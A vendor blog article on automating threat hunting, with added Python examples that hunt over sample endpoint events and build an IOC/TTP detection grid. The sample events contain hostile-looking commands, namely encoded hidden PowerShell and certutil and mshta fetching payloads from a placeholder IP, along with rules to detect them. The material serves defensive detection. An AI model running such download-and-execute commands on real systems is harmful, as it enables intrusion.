Previously, we touched upon the finer points of creating and implementing your very first threat-hunting framework. Now that you have mastered the core basics, it is time to jump to the next level: streamlining your security operations through automated threat hunting. So, without further ado, let’s talk about how you can add some automation muscle to your most important threat-hunting jobs. Enjoy, and don’t forget to subscribe to Heimdal®’s newsletter for more goodies.
Breaking Away from Tradition with Automated Threat Hunting
Before we dive into the specifics, we should set some time aside for the elephant in the room: why should security teams consider automation at all? Threat hunting is less mature than the established detection, prevention, and mitigation disciplines, but because it cuts across all three of them it is well suited (some would say uniquely suited) to modern campaigns that stretch across multiple attack surfaces and rely on tradecraft designed to slip past even the most seasoned security specialist.
As far as scope is concerned, cyber threat hunting is the proactive search of an organization’s systems and networks for threats that have evaded traditional detection engines and methodologies. The goal is to find and counter threat actors as early as possible in the attack chain, while improving both the speed and the accuracy of the organization’s response to advanced threats.
So, what does manual threat hunting involve? Consider the hunting lifecycle. As you probably know by now, any self-respecting SOC analyst works through a five-phase plan: hypothesis, data collection & interpretation, testing, acting, and proactivity (feeding what was learned back into new hypotheses and detections). In manual threat hunting, each of these steps depends heavily on the knowledge and experience of the analyst conducting the investigation and, just as importantly, on their documentation discipline. Incident documentation that records everything from the POI (Point of Infiltration) to APT-specific TTPs helps the analyst act promptly, contain post-infiltration effects, and protect the organization’s assets against recurrence. However, this case-by-case approach, even when guided by pre-defined playbooks, becomes highly inefficient when confronted with malware that changes form, enters through ‘untraditional’ paths, or actively works against detection and prevention systems.
Furthermore, manual threat hunting cannot keep pace with the many variants that make up today’s malware. Polymorphic malware, for instance, re-encrypts its payload and rewrites its decryption routine with each new copy, so a static signature written for one sample will not match the next. Ultimately, manual threat hunting may simply become obsolete when facing AI-powered malware, a menace that may soon become the norm: Protocol’s interview with cybersecurity expert Mikko Hyppönen suggests that APTs are perhaps a couple of years away from fully weaponizing artificial intelligence, and adds that threat groups, such as the one behind the infamous Conti ransomware, are actively recruiting dissatisfied AI/ML engineers to further that ‘project’.
Given these tectonic shifts in the threat landscape, it is clear that purely manual threat hunting risks being stuck in the proverbial doldrums. To overcome this drawback, we need to move the needle in the direction of automation. Let’s start with the first item on your to-do list.
Eliminating time spent on menial tasks
One of the undisputable merits of automation is its ability to deal a crippling blow to monotony. Threat-hunting automation raises the efficiency of your SOC team by letting it (re)focus on high-priority work rather than menial tasks. Examples include turning the results of previous detections into new alert rules, log collection and normalization (the bane of any security specialist or IT administrator), ticketing systems that auto-prioritize events according to their current state (response vs. remediation), and cataloging anomalous behavior through custom reporting features.
Joining Efforts to Reduce False-Positive Rates
The man-meets-machine approach is not just a great plot for a sci-fi flick; it can have a positive impact on your entire threat-hunting effort. Consider one of the fundamental aspects of the endeavor: data gathering and interpretation. As you probably know by now, the data fed into such a system comes from every corner of your infrastructure (threat intel, SIEM alerts, analytics, network data, endpoint and identity data). With such wide coverage, it is sometimes impossible to tell whether the extracted signals reflect reality or are erroneous. Every scientific pursuit has a way of accounting for false positives, and threat hunting is no exception: fully automated event detection is bound to produce bogus results. This is where the human element comes in. When working with such a system, the SOC analyst must check that the results are consistent across sources and correct them (tune the rule, suppress the benign case) when the situation calls for it.
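To make the two points above concrete (menial hunt tasks automated, analyst feedback feeding back into the rules), here is an added example that is not part of the original article and not Heimdal product code: a small Python hunt loop run over a handful of constructed process-creation events. The rule names, ATT&CK technique mappings, severity weights, hostnames, and the IP 198.51.100.7 are all assumptions made for the demo.

```python
"""Hunt-automation loop over constructed endpoint events (added example).
The events, rule names, ATT&CK mappings and scoring weights are illustrative
assumptions for the demo, not any vendor's product logic."""
import hashlib
import json
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Callable

# Constructed Sysmon-style process-creation events (invented hosts, users, IP).
RAW_EVENTS = """\
{"ts": "2024-05-01T08:01:02Z", "host": "ws-17", "user": "j.doe", "image": "powershell.exe", "parent": "winword.exe", "cmd": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"}
{"ts": "2024-05-01T08:03:10Z", "host": "ws-22", "user": "svc_backup", "image": "powershell.exe", "parent": "taskeng.exe", "cmd": "powershell.exe -File C:/scripts/backup.ps1"}
{"ts": "2024-05-01T08:05:44Z", "host": "srv-db1", "user": "admin", "image": "certutil.exe", "parent": "cmd.exe", "cmd": "certutil.exe -urlcache -split -f http://198.51.100.7/a.txt a.txt"}
{"ts": "2024-05-01T08:06:01Z", "host": "ws-17", "user": "j.doe", "image": "rundll32.exe", "parent": "explorer.exe", "cmd": "rundll32.exe shell32.dll,Control_RunDLL"}
{"ts": "2024-05-01T08:09:30Z", "host": "ws-31", "user": "m.li", "image": "powershell.exe", "parent": "explorer.exe", "cmd": "powershell.exe -enc UwBlAHQALQBMAG8AYwBhAHQAaQBvAG4A"}
{"ts": "2024-05-01T08:11:15Z", "host": "ws-05", "user": "t.ng", "image": "mshta.exe", "parent": "excel.exe", "cmd": "mshta.exe http://198.51.100.7/p.hta"}
"""
OFFICE = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
LOLBINS = {"powershell.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}
ENC_PS = re.compile(r"\s-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I)


@dataclass(frozen=True)
class Rule:
    name: str
    technique: str                 # assumed ATT&CK mapping for the hypothesis
    severity: int                  # 1..5, feeds the ticket priority
    match: Callable[[dict], bool]


@dataclass
class Finding:
    event: dict
    hits: list = field(default_factory=list)

    @property
    def priority(self) -> int:
        return sum(r.severity for r in self.hits)


def parse_events(raw: str) -> list:
    """One JSON object per line; blank or malformed lines are skipped."""
    events = []
    for line in raw.splitlines():
        try:
            if line.strip():
                events.append(json.loads(line))
        except json.JSONDecodeError:
            continue  # in production: count and alert on parse failures
    return events


def build_rules(prior_iocs: list) -> list:
    """Behavioural hypotheses plus rules promoted from previously confirmed IOCs."""
    rules = [
        Rule("encoded_powershell", "T1059.001", 3,
             lambda e: e["image"] == "powershell.exe" and bool(ENC_PS.search(e["cmd"]))),
        Rule("office_spawns_lolbin", "T1566.001", 4,
             lambda e: e["parent"] in OFFICE and e["image"] in LOLBINS),
        Rule("certutil_download", "T1105", 4,
             lambda e: e["image"] == "certutil.exe" and "urlcache" in e["cmd"].lower()),
    ]
    for ioc in prior_iocs:  # "alerts from previous detections": one rule per confirmed IOC
        rules.append(Rule(f"known_bad_{ioc}", "T1071", 5, lambda e, ioc=ioc: ioc in e["cmd"]))
    return rules


def suppression_key(rule_name: str, event: dict) -> str:
    """Stable key for an analyst 'false positive' decision: same rule, host and command line."""
    return hashlib.sha256(f"{rule_name}|{event['host']}|{event['cmd']}".encode()).hexdigest()


def hunt(events: list, rules: list, suppressed: frozenset = frozenset()) -> list:
    """Run every rule over every event; drop hits the analyst already judged benign."""
    findings = []
    for ev in events:
        hits = [r for r in rules if r.match(ev) and suppression_key(r.name, ev) not in suppressed]
        if hits:
            findings.append(Finding(ev, hits))
    return findings


def ticket_queue(findings: list) -> list:
    """Auto-prioritised tickets: highest score first; a high-severity hit goes
    straight to the response queue, anything else waits for analyst triage."""
    tickets = [{
        "host": f.event["host"], "user": f.event["user"], "priority": f.priority,
        "rules": [r.name for r in f.hits],
        "techniques": sorted({r.technique for r in f.hits}),
        "queue": "response" if any(r.severity >= 4 for r in f.hits) else "triage",
    } for f in findings]
    return sorted(tickets, key=lambda t: (-t["priority"], t["host"]))


def catalog(findings: list) -> Counter:
    """Anomaly catalogue for the custom report: rule hits per host."""
    return Counter(f.event["host"] for f in findings for _ in f.hits)


if __name__ == "__main__":
    evs, rules = parse_events(RAW_EVENTS), build_rules(prior_iocs=["198.51.100.7"])
    first_pass = hunt(evs, rules)
    for t in ticket_queue(first_pass):
        print(t)
    # Analyst feedback: the ws-31 encoded command is a sanctioned admin script, suppress it.
    fp = next(f for f in first_pass if f.event["host"] == "ws-31")
    benign = frozenset({suppression_key("encoded_powershell", fp.event)})
    print(len(hunt(evs, rules, benign)), "findings after feedback;", catalog(first_pass))
```

Two design choices matter here. The suppression key is scoped to rule, host and exact command line, so the analyst’s "benign" verdict silences only that case and the same encoded command on another host still raises a ticket. Promoting a confirmed IOC into its own high-severity rule is the cheapest form of "alerts from previous detections", but it is also the most brittle, which is why the behavioural rules carry their own weight in the score.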
From Prototype to Vital Business Unit
Any organization can opt in to threat hunting; whether through a SIEM, SOAR, XDR, or anything in between, anyone with the right resources (and skill set) can deploy such a capability. However, simply ticking another box is not the same as having a mature threat-hunting program in place. Beyond flowcharts, hypotheses, playbooks, and everything in between lies structured threat hunting. In essence, this approach harmonizes every bit of information about a malicious strain or attacker (IOAs, IOCs, and TTPs) in order to derive actionable detection grids, enforce new security policies and/or automated responses, mitigate known post-infiltration side effects, and, of course, help your SOC team strengthen the organization’s overall security posture. Automated threat hunting backed by structure can make all the difference in the (cyber)world.
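As an added illustration of structured hunting (not code from the article or from Heimdal), the Python below folds IOCs from two differently formatted feeds, a list of behavioural IOAs, and an actor’s TTP list into one detection grid and an automated response policy. The actor profile, the indicators, the ATT&CK mappings, and the SOC’s detection inventory are invented for the example.

```python
"""Structured hunting: fold IOCs, IOAs and TTPs into one detection grid.
Added example. The actor profile, IOC feeds, IOA list, ATT&CK mappings and the
SOC's detection inventory below are all invented to show the mechanics."""
import re
from collections import defaultdict

# Constructed intel about one hypothetical actor, as received from three sources.
REPORT_IOCS = ["hxxp://198[.]51[.]100[.]7/p.hta", "malware-update[.]example", "198.51.100.7"]
FEED_IOCS = ["  198.51.100.7 ", "MALWARE-UPDATE.EXAMPLE", "d41d8cd98f00b204e9800998ecf8427e"]
# Behavioural indicators (IOAs) the team can express as rules: (name, technique, data source).
IOAS = [
    ("office_spawns_lolbin", "T1566.001", "process"),
    ("encoded_powershell", "T1059.001", "process"),
    ("lsass_handle_open", "T1003.001", "process"),
]
# Techniques attributed to the actor (TTPs) and what the SOC already detects today.
ACTOR_TTPS = ["T1566.001", "T1059.001", "T1105", "T1003.001", "T1021.002", "T1071"]
DEPLOYED = {"T1566.001": ["edr"], "T1059.001": ["edr", "siem"], "T1071": ["proxy"]}

_PATTERNS = [  # order matters: hashes and IPs before the permissive domain pattern
    ("sha256", re.compile(r"^[0-9a-f]{64}$")),
    ("sha1", re.compile(r"^[0-9a-f]{40}$")),
    ("md5", re.compile(r"^[0-9a-f]{32}$")),
    ("ip", re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")),
    ("url", re.compile(r"^https?://\S+$")),
    ("domain", re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$")),
]


def refang(raw: str) -> str:
    """Undo the common defanging styles used in reports (hxxp, [.] and (.))."""
    s = raw.strip()
    s = re.sub(r"^hxxps?", lambda m: m.group(0).replace("xx", "tt"), s, flags=re.I)
    return s.replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")


def classify(ioc: str):
    """Return (kind, canonical value); unknown shapes are kept but flagged for review."""
    value = refang(ioc)
    probe = value.lower()
    for kind, pat in _PATTERNS:
        if pat.match(probe):
            # URL paths are case-sensitive; everything else is canonicalised to lower case.
            return kind, (value if kind == "url" else probe)
    return "unknown", value


def normalise_iocs(*sources) -> dict:
    """Merge several feeds into one de-duplicated, typed indicator set."""
    merged = defaultdict(set)
    for source in sources:
        for ioc in source:
            kind, value = classify(ioc)
            merged[kind].add(value)
    return {k: sorted(v) for k, v in merged.items()}


def detection_grid(actor_ttps, ioas, deployed) -> dict:
    """Technique -> what covers it. 'proposed' means an IOA is drafted but nothing is
    deployed; 'gap' means no rule exists or is even drafted."""
    drafted = defaultdict(list)
    for name, technique, _source in ioas:
        drafted[technique].append(f"ioa:{name}")
    grid = {}
    for t in actor_ttps:
        live, draft = deployed.get(t, []), drafted.get(t, [])
        status = "covered" if live else ("proposed" if draft else "gap")
        grid[t] = {"sources": live + draft, "status": status}
    return grid


def coverage_gaps(grid: dict) -> list:
    return sorted(t for t, row in grid.items() if row["status"] == "gap")


def response_policy(iocs: dict) -> list:
    """Turn typed indicators into enforcement actions for the relevant control."""
    action_for = {"ip": "firewall_block", "domain": "dns_sinkhole", "url": "proxy_block",
                  "md5": "edr_hash_block", "sha1": "edr_hash_block", "sha256": "edr_hash_block"}
    return [{"action": action_for[kind], "value": v}
            for kind, values in iocs.items() if kind in action_for for v in values]


if __name__ == "__main__":
    iocs = normalise_iocs(REPORT_IOCS, FEED_IOCS)
    grid = detection_grid(ACTOR_TTPS, IOAS, DEPLOYED)
    print(iocs)
    print("gaps:", coverage_gaps(grid))
    for action in response_policy(iocs):
        print(action)
```

The grid is the artifact that turns a pile of intel into work items: "covered" techniques need nothing, "proposed" ones need the drafted IOA deployed and tested, and "gap" techniques need a new hypothesis. Note that indicators of kind "unknown" deliberately produce no enforcement action; pushing an unparsed string into a firewall or EDR block list is how a typo in a report becomes an outage.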
Heimdal®’s Approach to Automated Threat Hunting
Heimdal®’s Threat-Hunting and Action Center is the centerpiece of a hybrid approach to cybersecurity. It combines elements from key defensive disciplines such as information security, IT auditing and consulting, threat intelligence, digital forensics, data analysis, and compliance in order to engineer a solution designed to cover attack vectors including spam, weak credential generation, storage and management, insider threats, certificate theft, denial of service, physical theft, regulatory non-compliance, data destruction, misconfiguration, IP leakage, and phishing.
Conclusion
This wraps up my article on automated threat hunting. I hope you have enjoyed it. Before I go, let me share a couple of insights that could help you along the way. Threat hunting needs three basic ingredients: time, knowledge, and resources. So, don’t expect things to happen overnight; people require training, the setup takes time, and, of course, dedicated resources are needed for this type of undertaking.
If you liked this article, follow us on LinkedIn, Twitter, Facebook, and YouTube for more cybersecurity news and topics.